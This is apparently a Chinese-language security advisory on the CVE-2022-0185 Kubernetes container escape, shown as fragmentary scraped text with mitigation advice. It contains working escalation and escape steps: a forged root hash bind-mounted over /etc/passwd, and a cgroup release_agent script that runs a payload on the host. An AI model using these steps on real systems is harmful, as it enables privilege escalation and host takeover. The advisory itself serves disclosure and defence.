高危!!Kubernetes 新型容器逃逸漏洞预警
导读:附完整解决方案。
// 使用 fsconfig 系统调用添加由 val 指向的以空字符(NULL)结尾的字符串
fsconfig(fd, FSCONFIG_SET_STRING, "\x00", val, 0);
Docker 和其他容器运行时默认都会使用 Seccomp 配置文件来阻止容器中的进程使用危险的系统调用,以保护 Linux 命名空间边界。
Seccomp(全称:secure computing mode)在 2.6.12 版本(2005 年 3 月 8 日)中引入 Linux 内核,将进程可用的系统调用限制为四种:read,write,_exit,sigreturn。最初的这种模式是白名单方式,在这种安全模式下,除了已打开的文件描述符和允许的四种系统调用,如果尝试其他系统调用,内核就会使用 SIGKILL 或 SIGSYS 终止该进程。
$ docker run --rm -it alpine /bin/sh
/ # unshare
unshare: unshare(0x0): Operation not permitted
$ kubectl run --rm -it test --image=ubuntu /bin/bash
If you don't see a command prompt, try pressing enter.
root@test:/# lsns | grep user
4026531837 user 3 1 root /bin/bash
root@test:/#
root@test:/# apt update && apt install -y libcap2 libcap-ng-utils
root@test:/# ......
root@test:/# pscap -a
ppid pid name command capabilities
0 1 root bash chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap
root@test:/# unshare -Urm
#
# pscap -a
ppid pid name command capabilities
0 1 root bash chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap
1 265 root sh full
# lsns | grep user
4026532695 user 3 265 root -sh
$ which python3
/usr/bin/python3
$ ll /usr/bin/python3
lrwxrwxrwx 1 root root 9 Mar 13 2020 /usr/bin/python3 -> python3.8*
$ setcap CAP_SYS_ADMIN+ep /usr/bin/python3.8
$ getcap /usr/bin/python3.8
/usr/bin/python3.8 = cap_sys_admin+ep
$ useradd test -d /home/test -m
$ su test
$ cd ~
$ cp /etc/passwd ./
$ openssl passwd -1 -salt abc password
$1$abc$BXBqpb9BZcZhXLgbee.0s/
# 将第一行的 root:x 改为 root:$1$abc$BXBqpb9BZcZhXLgbee.0s/
$ head -2 passwd
root:$1$abc$BXBqpb9BZcZhXLgbee.0s/:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
# cat mount-passwd.py
from ctypes import *
libc = CDLL("libc.so.6")
libc.mount.argtypes = (c_char_p, c_char_p, c_char_p, c_ulong, c_char_p)
MS_BIND = 4096
source = b"/home/test/passwd"
target = b"/etc/passwd"
filesystemtype = b"none"
options = b"rw"
mountflags = MS_BIND
libc.mount(source, target, filesystemtype, mountflags, options)
$ python3 mount-passwd.py
$ su root
Password:
root@coredns:/home/test#
$ find / -name "*flag*" 2>/dev/null
/sys/kernel/tracing/events/power/pm_qos_update_flags
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/kernel/debug/block/vdb/hctx0/flags
/sys/kernel/debug/block/vda/hctx0/flags
/sys/kernel/debug/block/loop7/hctx0/flags
/sys/kernel/debug/block/loop6/hctx0/flags
/sys/kernel/debug/block/loop5/hctx0/flags
/sys/kernel/debug/block/loop4/hctx0/flags
/sys/kernel/debug/block/loop3/hctx0/flags
/sys/kernel/debug/block/loop2/hctx0/flags
/sys/kernel/debug/block/loop1/hctx0/flags
/sys/kernel/debug/block/loop0/hctx0/flags
....
$ cat /sys/kernel/debug/block/vdb/hctx0/flags
alloc_policy=FIFO SHOULD_MERGE
$ umount /etc/passwd
$ docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash
# Mounts the RDMA cgroup controller and create a child cgroup
# This technique should work with the majority of cgroup controllers
# If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist"
# It's because your setup doesn't have the RDMA cgroup controller, try change rdma to memory to fix it
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
# Finds path of OverlayFS mount for container
# Unless the configuration explicitly exposes the mount point of the host filesystem
# see https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
# Sets release_agent to /path/payload
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# Creates a payload
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
# Executes the attack by spawning a process that immediately ends inside the "x" child cgroup
# By creating a /bin/sh process and writing its PID to the cgroup.procs file in "x" child cgroup directory
# The script on the host will execute after /bin/sh exits
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# Reads the output
cat /output
root@0c84f7587629:/# cat /output
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.3 172704 13148 ? Ss 2021 131:32 /sbin/init nopti
root 2 0.0 0.0 0 0 ? S 2021 0:18 [kthreadd]
root 3 0.0 0.0 0 0 ? I< 2021 0:00 [rcu_gp]
root 4 0.0 0.0 0 0 ? I< 2021 0:00 [rcu_par_gp]
root 6 0.0 0.0 0 0 ? I< 2021 0:00 [kworker/0:0H-kblockd]
root 8 0.0 0.0 0 0 ? I< 2021 0:00 [mm_percpu_wq]
root 9 0.0 0.0 0 0 ? S 2021 18:36 [ksoftirqd/0]
root 10 0.0 0.0 0 0 ? I 2021 262:22 [rcu_sched]
root 11 0.0 0.0 0 0 ? S 2021 3:06 [migration/0]
root 12 0.0 0.0 0 0 ? S 2021 0:00 [idle_inject/0]
root 14 0.0 0.0 0 0 ? S 2021 0:00 [cpuhp/0]
root 15 0.0 0.0 0 0 ? S 2021 0:00 [cpuhp/1]
......
# pod-test.yaml
apiVersion: v1
kind: Pod
metadata:
name: protected
spec:
containers:
- name: protected
image: ubuntu
command:
- sleep
- infinity
securityContext:
seccompProfile:
type: RuntimeDefault
$ kubectl exec -it protected -- bash
root@protected:/#
root@protected:/# unshare -Urm
unshare: unshare failed: Operation not permitted
$ echo "kernel.unprivileged_userns_clone=0" > /etc/sysctl.d/userns.conf
$ sysctl -p /etc/sysctl.d/userns.conf
$ echo "user.max_user_namespaces=0" > /etc/sysctl.d/userns.conf
$ sysctl -p /etc/sysctl.d/userns.conf
如果你的环境可以接受给内核打补丁,也能接受重启系统,最好打补丁,或者升级内核。 减少使用能够访问 CAP_SYS_ADMIN 的特权容器。 对于没有特权的容器,确保有一个 Seccomp 过滤器来阻止其对 unshare 的调用,以减少风险。Docker 没问题,Kubernetes 需要额外操作。 未来可以为 Kubernetes 集群中的所有工作负载启用 Seccomp 配置文件。目前该功能还处于 Alpha 阶段,需要通过特性开关(feature gate)[7]开启。 在主机层面禁止用户使用 user namespace 的能力。
CVE-2022-0185: Kubernetes Container Escape Using Linux Kernel Exploit[8] CVE-2022-0185: Detecting and mitigating Linux Kernel vulnerability causing container escape[9] Excessive Capabilities[10] CAP_SYS_ADMIN[11]
干货直达👇
评论